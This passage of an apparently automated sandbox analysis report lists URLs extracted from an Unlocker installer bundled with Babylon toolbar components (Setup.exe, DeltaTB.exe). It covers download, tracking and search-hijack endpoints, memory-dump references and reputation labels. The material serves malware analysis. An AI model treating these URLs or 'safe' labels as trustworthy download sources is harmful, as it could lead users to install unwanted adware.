00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355309073.00000000022AE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355215955.00000000022A6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drfalse
                		high
                http://unlocker.emptyloop.com/PrUnlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drfalse
                  		high
                  http://babylon.com/?hp%d:%d;dsp%d:%d;hpu%d:%s;dspu%d:%s;COO_gcSCOO_scSBTRSCOO_suaopenopenieffcrBUSolDeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.drfalse
                    		high
                    http://www.my-online-search.com/?babsrc=HP_ofln&mntrId=C839ECF4BBEA1588&dlb=0&affID=122471Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://stat.info-stream.net/report.php?no_policy=1&lang=0&sSW:Setup.exe, 00000002.00000003.355252592.00000000022AA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356198792.00000000022B4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355592760.00000000022B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355309073.00000000022AE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355215955.00000000022A6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://unlocker.emptyloop.com/DitUnlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drfalse
                      		high
                      http://www.my-online-search.com/?babsrc=HP_ofln&mntrId=C839ECF4BBEA1588&dlb=0&affID=122471datSetup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358258275.0000000002368000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354747612.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354625909.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355334279.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357325041.0000000002367000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356257154.0000000002323000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357274188.0000000002357000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358063277.0000000002368000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356514833.0000000002330000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356370103.0000000002329000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://unlocker.emptyloop.com/OvaUnlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drfalse
                        		high
                        http://unlocker.emptyloop.com/GETUnlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drfalse
                          		high
                          http://unlocker.emptyloop.com/PorukaUnlocker.exe.0.drfalse
                            		high
                            http://www.my-online-search.com/?babsrc=HP_ofln&mntrId=C839ECF4BBEA1588&dlb=0&affID=122471tSetup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358258275.0000000002368000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354747612.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354625909.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355334279.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357325041.0000000002367000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356257154.0000000002323000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357274188.0000000002357000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358063277.0000000002368000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356514833.0000000002330000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356370103.0000000002329000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://Kernel32.dllSetDllDirectoryWDeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://babylon.comzrundll32.exe, 00000003.00000002.347884515.00000000033F0000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://unlocker.emptyloop.com/AccessoUnlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drfalse
                              		high
                              http://www.babylon.com/redirects/download.cgi?Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drfalse
                                		high
                                http://dl.babylon.com/site/files/Setup9/dwr/latest/latest_bl/Setup2.zpbZSetup.exe, 00000002.00000002.359689566.0000000000867000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://dl.babylon.com/site/files/Setup9/dwr/DefaultClient/DefaultClient/Default-tbdat.zpb;http://dl.Setup.exe, 00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drfalse
                                    		high
                                    http://dl.babylon.com/site/files/Setup9/dwr/latest/latest_bl/Setup2.zpbiSetup.exe, 00000002.00000002.359689566.0000000000867000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.my-online-search.comSetup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354747612.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354625909.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358181176.000000000236E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355334279.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357325041.0000000002367000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358323085.000000000236F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356257154.0000000002323000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357274188.0000000002357000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358063277.0000000002368000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356514833.0000000002330000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356370103.0000000002329000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://stat.info-stream.net/report.php?no_policy=1&lang=0&sSetup.exe, 00000002.00000002.360465899.00000000022B6000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://unlocker.emptyloop.com/TUnlocker.exe.0.drfalse
                                        		high
                                        http://stpui.babylon.com/setup_cms_url?name=&param=&lang=%d&ver=%d&bld=%d&&ver=DeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.drfalse
                                          		high
                                          http://unlocker.emptyloop.com/PUnlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drfalse
                                            		high
                                            http://www.babylon.com/redirects/redir.cgi?type=machinetransDeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343726697.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344438579.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343213411.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342989828.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342313026.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344897131.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342737496.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345307808.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344737594.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345130958.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354747612.0000000002317000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://unlocker.emptyloop.com/JuurdepUnlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drfalse
                                                		high
                                                http://bts.babylon.com/index.php=Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://babylon.comGaSetup.exe, 00000002.00000003.355252592.00000000022AA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356198792.00000000022B4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355592760.00000000022B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355309073.00000000022AE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355215955.00000000022A6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://stat.info-strea/downloader.php?ver=9.1.1.10&affilID=122471&guid=Setup.exe, 00000002.00000002.359689566.0000000000838000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://unlocker.emptyloop.com/PesanUnlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drfalse
                                                    		high
                                                    http://babylon.com/Crundll32.exe, 00000003.00000002.347884515.0000000003415000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://info.babylon.com/campaigns/DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drfalse
                                                        		high
                                                        http://nsis.sf.net/NSIS_ErrorErrorUnlocker1.9.2.exe, uninst.exe.0.drfalse
                                                          		high
                                                          http://dl.babylon.com/site/files/Setup9/dwr/latest/latest_bl/Setup2.zpb;downloader[1].htm.2.drfalse
                                                            		high
                                                            http://stat.info-stream.net/report.php?no_policy=1&lang=0&source=setup-end&stage=91&ver=9.1.1.10&affSetup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmp, log_file.txt.2.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://bis.babylon.com/jSetup.exe, 00000002.00000003.355252592.00000000022AA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356198792.00000000022B4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355592760.00000000022B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355309073.00000000022AE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355215955.00000000022A6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.my-online-search.com&babsrc=SP_ofln&mntrId=&dlb=%d&babsrc=SP_def&NT_HP_TB_SP_MyDeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.drfalse
                                                              • Avira URL Cloud: safe
                                                              		low
                                                              http://www.babylon.com/redirects/purchase.cgi?Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drfalse
                                                                		high
                                                                http://nsis.sf.net/NSIS_ErrorUnlocker1.9.2.exe, uninst.exe.0.drfalse
                                                                  		high
                                                                  http://bts.babylon.com/index.phpDeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drfalse
                                                                    		high
                                                                    http://babylon.com/lesrundll32.exe, 00000003.00000002.347884515.00000000033FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://stpui.babylon.com/Setup.exefalse
                                                                        		high
                                                                        http://tc.babylon.com/Ginger/correctDeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drfalse
                                                                          		high
                                                                          http://unlocker.emptyloop.com/CeUnlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drfalse
                                                                            		high
                                                                            http://www.babylon.com/redirects/redir.cgi?no_policy=1&type=%s&lang=%d9.1.1.10HPTBDSPukieffcrver=&&mDeltaTB.exe, 00000001.00000003.361456680.0000000002331000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000000.340600783.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe, 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp, Setup.exe.1.drfalse
                                                                              		high
                                                                              http://babylon.com=rundll32.exe, 00000003.00000002.347884515.00000000033FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		low
                                                                              http://info.babylon.com/stat/client_ga.php?name=$DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360644771.0000000002387000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343726697.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344438579.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343213411.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342989828.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342313026.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344897131.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342737496.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345307808.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344737594.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345130958.0000000002317000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.my-online-search.com/?babsrc=HP_ofln&mntrId=C839ECF4BBEA1588&dlb=0&affID=1224711588Setup.exe, 00000002.00000003.355893826.000000000231A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358551623.000000000237A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357162551.0000000002345000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357867781.0000000002371000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356035345.0000000002322000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356796571.0000000002331000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354921205.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360615970.000000000237C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354747612.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354625909.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355334279.0000000002317000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357325041.0000000002367000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358204631.0000000002372000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356257154.0000000002323000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357274188.0000000002357000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.358754148.000000000237A000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356514833.0000000002330000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356370103.0000000002329000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://babylon.comCrundll32.exe, 00000003.00000002.347884515.00000000033FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://bis.babylon.com/FSetup.exe, 00000002.00000003.355252592.00000000022AA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.356198792.00000000022B4000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022B6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355592760.00000000022B0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355309073.00000000022AE000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355215955.00000000022A6000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.355161642.00000000022A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://unlocker.emptyloop.com/MesejUnlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drfalse
                                                                                    		high
                                                                                    http://www.babylon.com/redirects/redir.cgi?Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drfalse
                                                                                      		high
                                                                                      http://www.my-online-search.com/9.2.exerefoxSetup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://utils.babylon.com/country/DeltaTB.exe, 00000001.00000003.361456680.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360465899.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000002.360692910.00000000023A0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.345275350.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.354723745.00000000022BB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342266400.00000000022B7000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344418944.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342497747.00000000022BA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.343684462.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.344879058.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drfalse
                                                                                        		high
                                                                                        http://unlocker.emptyloop.com/TaUnlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drfalse
                                                                                          		high
                                                                                          http://www.babylon.com/redirects/client.cgi?Setup.exe, 00000002.00000003.342962556.00000000022BD000.00000004.00000020.00020000.00000000.sdmp, Babylon.dat.2.dr, Babylon.dat.1.drfalse
                                                                                            		high
                                                                                            http://www.my-online-search.com/?q=Setup.exe, 00000002.00000003.357062888.0000000002340000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://babylon.com/rundll32.exe, 00000003.00000002.347884515.0000000003415000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.347884515.0000000003428000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://unlocker.emptyloop.com/KyUnlocker1.9.2.exe, 00000000.00000003.351365373.0000000005109000.00000004.00000020.00020000.00000000.sdmp, Unlocker.exe.0.drfalse
                                                                                                		high
